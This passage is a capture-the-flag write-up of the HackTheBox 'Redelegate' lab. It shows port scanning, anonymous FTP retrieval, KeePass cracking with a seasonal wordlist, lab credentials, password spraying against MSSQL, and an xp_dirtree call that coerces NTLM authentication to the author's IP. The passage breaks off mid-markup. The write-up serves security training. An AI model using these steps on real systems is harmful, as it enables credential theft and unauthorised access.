srcset="https://substackcdn.com/image/fetch/$s_!62LE!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png 424w, https://substackcdn.com/image/fetch/$s_!62LE!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png 848w, https://substackcdn.com/image/fetch/$s_!62LE!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png 1272w, https://substackcdn.com/image/fetch/$s_!62LE!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa7350c44-a2e9-4e63-bd42-f390da63a2b7_842x525.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><em>From HTB: -</em></p><p>Let&#8217;s begin!</p><ol><li><p><em>Network Enumeration and Port Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;e190901b-e6cf-4233-87b7-b7b8097f3fa1&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ ping -c2 10.129.194.125
PING 10.129.194.125 (10.129.194.125) 56(84) bytes of data.
64 bytes from 10.129.194.125: icmp_seq=1 ttl=127 time=112 ms
64 bytes from 10.129.194.125: icmp_seq=2 ttl=127 time=113 ms

--- 10.129.194.125 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 111.710/112.336/112.962/0.626 ms</code></pre></div><p>Continue with NMAP Scanning:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p- --min-rate 8000 10.129.194.125 -oA nmap/nmap
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.194.125
Host is up (0.11s latency).
Not shown: 65504 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49932/tcp open  unknown
56913/tcp open  unknown
60766/tcp open  unknown
60767/tcp open  unknown
62711/tcp open  unknown
62715/tcp open  unknown
62727/tcp open  unknown
62735/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo nmap -Pn -p21,53,80,88,135,139,389,445,464,593,636,1433,3268-3269,3389,5985,9389 -sC -sV 10.129.194.125 -oA nmap/nmap-ports                                                                                                        
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for DC (10.129.194.125)
Host is up (0.11s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 10-20-24  01:11AM                  434 CyberAudit.txt
| 10-20-24  05:14AM                 2622 Shared.kdbx
|_10-20-24  01:26AM                  580 TrainingAgenda.txt
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-04 05:44:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-04-04T05:40:50
|_Not valid after:  2056-04-04T05:40:50
| ms-sql-ntlm-info: 
|   10.129.194.125:1433: 
|     Target_Name: REDELEGATE
|     NetBIOS_Domain_Name: REDELEGATE
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: redelegate.vl
|     DNS_Computer_Name: dc.redelegate.vl
|     DNS_Tree_Name: redelegate.vl
|_    Product_Version: 10.0.20348
| ms-sql-info: 
|   10.129.194.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2026-04-04T05:44:18+00:00; +12m56s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: redelegate.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=dc.redelegate.vl
| Not valid before: 2026-04-03T05:38:09
|_Not valid after:  2026-10-03T05:38:09
|_ssl-date: 2026-04-04T05:44:18+00:00; +12m56s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: REDELEGATE
|   NetBIOS_Domain_Name: REDELEGATE
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: redelegate.vl
|   DNS_Computer_Name: dc.redelegate.vl
|   DNS_Tree_Name: redelegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2026-04-04T05:44:08+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2026-04-04T05:44:09
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: mean: 12m55s, deviation: 0s, median: 12m55s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds</code></pre></div><p>From the NMAP Scans we know that:</p><ul><li><p>FTP is Anonymous ACCESS</p></li><li><p>MSSQL is going to be invloved</p></li></ul><p>And we got domain of</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">dc.redelegate.vl DC redelegate.vl</code></pre></div><p>So make it local.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!JOwW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!JOwW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png 424w, https://substackcdn.com/image/fetch/$s_!JOwW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png 848w, https://substackcdn.com/image/fetch/$s_!JOwW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png 1272w, https://substackcdn.com/image/fetch/$s_!JOwW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!JOwW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png" width="1922" height="864" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:864,&quot;width&quot;:1922,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:163450,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ffafbb0f2-0bbc-4cd8-aaf8-72e66ecff3ee_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!JOwW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png 424w, https://substackcdn.com/image/fetch/$s_!JOwW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png 848w, https://substackcdn.com/image/fetch/$s_!JOwW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png 1272w, https://substackcdn.com/image/fetch/$s_!JOwW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F6f347c0c-e7a8-443b-929c-12774672e245_1922x864.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The web would be second pririty.</p><ol start="2"><li><p><em>FTP Anonymous Access</em></p></li></ol><p>Based on NMAP there&#8217;s only 3 file, one of them is KDBX so I&#8217;ll crack it with my own tool:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">sudo wget -m --no-passive ftp://anonymous:anonymous@dc</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo wget -m --no-passive ftp://anonymous:anonymous@dc
--2026-04-04 01:32:21--  ftp://anonymous:*password*@dc/
           =&gt; &#8216;dc/.listing&#8217;
Resolving dc (dc)... 10.129.194.125
. . .[SNIP]. . .

FINISHED --2026-04-04 01:32:24--
Total wall clock time: 2.3s
Downloaded: 4 files, 3.9K in 0.001s (3.11 MB/s)</code></pre></div><p>And we got:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ tree .                                                                                                                                                                                                                                  
.
&#9492;&#9472;&#9472; dc
    &#9500;&#9472;&#9472; CyberAudit.txt
    &#9500;&#9472;&#9472; Shared.kdbx
    &#9492;&#9472;&#9472; TrainingAgenda.txt</code></pre></div><p>Upon the .TXT file we got a hint that we will get a password based on seasons:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ cat dc/CyberAudit.txt                                                                                                                                                                                                                   
OCTOBER 2024 AUDIT FINDINGS

. . .[SNIP]. . .


Friday 18th October | 11.30 - 13.30 - 7 attendees
"Weak Passwords" - Why "SeasonYear!" is not a good password 


Friday 25th October | 9.30 - 12.30 - 29 attendees
"What now?" - Consequences of a cyber attack and how to mitigate them</code></pre></div><p>This machine is made in 2025 so then I create this wordlists:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ cat pw.lst 
SeasonYear!
Summer2024!
Winter2024!
Fall2024!
Spring2024!
Autumn2024!
Summer2025!
Winter2025!
Fall2025!
Spring2025!
Autumn2025!</code></pre></div><p>With that let&#8217;s try to crack the KeePass, in this lab here&#8217;s I&#8217;ll just use <a href="https://github.com/byt3n33dl3/thc-jennifer">thc-jennifer</a></p><ul><li><p><a href="https://github.com/byt3n33dl3/thc-jennifer">github.com/byt3n33dl3/thc-jennifer</a></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!46H-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!46H-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png 424w, https://substackcdn.com/image/fetch/$s_!46H-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png 848w, https://substackcdn.com/image/fetch/$s_!46H-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png 1272w, https://substackcdn.com/image/fetch/$s_!46H-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!46H-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png" width="1456" height="786" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:786,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:166670,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!46H-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png 424w, https://substackcdn.com/image/fetch/$s_!46H-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png 848w, https://substackcdn.com/image/fetch/$s_!46H-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png 1272w, https://substackcdn.com/image/fetch/$s_!46H-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9e53ce76-d58e-4bf0-a309-803255ff3fe3_1652x892.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ jennifer www/dc/Shared.kdbx pw.lst 
  ____  _____  _____  _____  ___  _____  _____  _____ 
  \_  \/   __\/  _  \/  _  \/___\/   __\/   __\/  _  \
---|  ||   __||  |  ||  |  ||   ||   __||   __||  _  &lt;
\_____/\_____/\__|__/\__|__/\___/\__/   \_____/\__|\__\

  thc-Jennifer v2.1 || &lt;@byt3n33dl3&gt;

[*] kdbx v3  kdf=AES-KDF  rounds=600000
[*] wordlist=pw.lst  candidates=11  threads=4

[~] 9/11 (81.8%) | 540/min | ETA 0s
[+] cracked: Fall2024!</code></pre></div><p>Not even a second!</p><ol start="3"><li><p><em>KeePass Discovery</em></p></li></ol><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo kpcli --kdb www/dc/Shared.kdbx 
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help &lt;command&gt;' for details on individual commands.

kpcli:/&gt; ls
=== Groups ===
Shared/
kpcli:/&gt; cd Shared/
kpcli:/Shared&gt; ls
=== Groups ===
Finance/
HelpDesk/
IT/
kpcli:/Shared&gt; cd Finance/
kpcli:/Shared/Finance&gt; ls
=== Entries ===
0. Payrol App                                                             
1. Timesheet Manager                                                      
kpcli:/Shared/Finance&gt; show 0

Title: Payrol App
Uname: Payroll
 Pass: cVkqz4bCM7kJRSNlgx2G
. . .[SNIP]. . .

Title: FS01 Admin
Uname: Administrator
 Pass: Spdv41gg4BlBgSYIW1gF
  URL: 
Notes: 

kpcli:/Shared/IT&gt; show 2

Title: SQL Guest Access
Uname: SQLGuest
 Pass: zDPBpaF4FywlqIv11vii
  URL: 
Notes: </code></pre></div><p>In the KeePass we manage to discover many potential password and usernames.</p><ol start="4"><li><p><em>Password And Protocol Spraying</em></p></li></ol><p>I don&#8217;t usually create this path but due to taking long time of usernames and password brute-force, we just finally found one pairs and only works on MSSQL:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec mssql dc.redelegate.vl -u users.txt -p passwd.txt --local-auth --continue-on-success | grep "[+]"                                                                                                                          
MSSQL                    10.129.194.125  1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii 

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec mssql dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii --local-auth
MSSQL       10.129.194.125  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (EncryptionReq:False)
MSSQL       10.129.194.125  1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii</code></pre></div><p>PS: After some enumeration, the MSSQL would only best leading to RID identification, and giving us a valid local users.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">SQL (SQLGuest  guest@master)&gt; enum_links
SRV_NAME                     SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE               SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT   
--------------------------   ----------------   -----------   --------------------------   ------------------   ------------   -------   
WIN-Q13O908QBPG\SQLEXPRESS   SQLNCLI            SQL Server    WIN-Q13O908QBPG\SQLEXPRESS   NULL                 NULL           NULL      
. . .[SNIP]. . .
SQL (SQLGuest  guest@master)&gt; enum_logins
name       type_desc   is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin   
--------   ---------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------   
sa         SQL_LOGIN             1          1               0             0            0              0           0           0           0   
SQLGuest   SQL_LOGIN             0          0               0             0            0              0           0           0           0   
SQL (SQLGuest  guest@master)&gt; enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   
guest                public     NULL        NULL        guest           b'2         '   b'00'   
INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   
sys                  public     NULL        NULL        NULL            b'4         '    NULL   
SQL (SQLGuest  guest@master)&gt; xp_dirtree \\10.10.14.20\error
. . .[SNIP]. . .</code></pre></div><p>I&#8217;ve tried NetNTLM, etc you named but none of them are crack or leading to something else:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!qxXi!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!qxXi!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png 424w, https://substackcdn.com/image/fetch/$s_!qxXi!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png 848w, https://substackcdn.com/image/fetch/$s_!qxXi!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png 1272w, 